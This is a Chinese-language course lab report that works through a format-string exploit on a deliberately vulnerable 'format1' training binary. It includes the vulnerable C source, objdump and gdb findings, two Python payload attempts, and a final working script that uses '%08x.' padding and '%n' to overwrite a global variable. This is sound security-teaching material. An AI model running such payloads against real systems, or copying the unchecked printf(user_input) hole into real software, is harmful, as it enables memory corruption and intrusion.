## CS3312 Lab Report Format1

Osamu Takenaka 520030990026

#### 源码分析


x86汇编代码(由objdump得到)：

```asm
080483f4 <vuln>:
```


C语言源代码：
```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
    printf(string);

    if(target) {
        printf("you have modified the target :)\n");
    }
}

int main(int argc, char **argv)
{
    vuln(argv[1]);
}


```

### 程序结构

1. **全局变量声明**：`int target` 变量被全局声明，这意味着它在整个程序的内存空间中都可以访问。

2. **漏洞函数 `vuln`**：
   - 该函数接受一个字符串作为参数，并将其直接传递给 `printf` 函数。如果输入字符串未经控制或清洗，这种用法是不安全的。
   - 如果 `target` 变量已经被修改（假设初始值为0），则会打印一条消息指示目标已被更改。

3. **主函数**：
   - 主函数接受命令行参数，并直接将第一个参数传递给 `vuln` 函数，而没有进行任何验证或清洗。
   - 这意味着如果命令行参数包括格式化说明符（如 `%s`、`%x`、`%n` 等），它们可以用来读取或写入内存，可能改变程序的行为或泄露内存内容。

利用格式化字符串漏洞：

- **读取内存**：可以使用格式说明符来读取内存位置，这有助于了解内存布局或提取敏感信息。
- **写入内存**：`%n` 说明符可以用来向内存地址写入值，这里我们用来修改 `target` 变量。
<!-- 
### 攻击示例：
如果攻击者传递像 `"%08x.%08x.%08x.%08x"` 这样的参数，它会使 `printf` 打印栈上四个内存位置的值。如果参数包括 `%n`，则可能写入内存。 -->


攻击方法：

<img src="https://cdn.mathpix.com/snip/images/dX-nGKBj9N6ViyBrXrHNORDCoyUopcRKDAOQn6kjGLk.original.fullsize.png" width="500" />

一开始我们可以用objdump很轻松地得到target的地址，是`0x08049638`

<img src="https://cdn.mathpix.com/snip/images/2LInGQVw-JV4Pn-WZoM2aqSlfyJpVMhnj52M89vKy6c.original.fullsize.png" width="500" />


我们在设计输入的时候，由于输入后的字符串会保存在数据区，数据区在栈区后面，因此我们可以通过不断地加入`%08x`，就可以逐个读取栈上的值。

最终目的是，读取到位于数据区的输入的字符串中，我们加入的target的地址的字符串`\x38\x96\x04\x08`，然后读取到这里时用`%n`来读，从而修改target的值。

#### gdb调试
我们先跑了一些测试，发现栈的地址偏移会随着输入的字符串的长度而变化，非常不确定。而且，gdb里面的栈地址和实际运行时的栈地址也会有所偏移。

<img src="https://cdn.mathpix.com/snip/images/R71yIyC8oxrLt2rqChDHjHlhqyQiKD8TkrviTvbg4rE.original.fullsize.png" width="500" />

---
所以我想到，类似于nop_slide的思想，在字符串的开头加入一大片的target地址，这样即使栈地址有所偏移，也能尽最大可能保证命中target地址。


第一次尝试：
```python
buffer = '%08x.' * 400
# 0x8049638
target_addr = '\x38\x96\x04\x08' 
padding = target_addr * 2000 + buffer + '%n' 

print padding
```

<img src="https://cdn.mathpix.com/snip/images/UfDqMkv9dUpzl7oDvDq_3BRM0CxRZDEQk5hvZs1qQ18.original.fullsize.png" width="80%" />

我们发现最后打印的地址是04963808，而不是我们想要的08049638，这是地址没对齐的问题，我们需要稍微偏移一下。

---
第二次尝试：
```python
buffer = '%08x.' * 400
# 0x8049638
target_addr = '\x38\x96\x04\x08' 
padding = 'AAA' + target_addr * 1999 + buffer + '%n' + 'A'

print padding
```

<img src="https://cdn.mathpix.com/snip/images/Qnra_2wTipf_Ywx8JklrrDehK5vtyMVKeasMlikVz90.original.fullsize.png" width="80%" />

攻击成功

#### 攻击脚本内容

script_format1.py:

```python
buffer = '%08x.' * 400
# 0x8049638
target_addr = '\x38\x96\x04\x08' 
padding = 'AAA' + target_addr * 1999 + buffer + '%n' + 'A'
print padding
```

    在终端中运行：

```bash
./format1 $(python ../script/script_format1.py)
```

#### 结果（非GDB环境）

<img src="https://cdn.mathpix.com/snip/images/Qnra_2wTipf_Ywx8JklrrDehK5vtyMVKeasMlikVz90.original.fullsize.png" width="80%" />

攻击成功


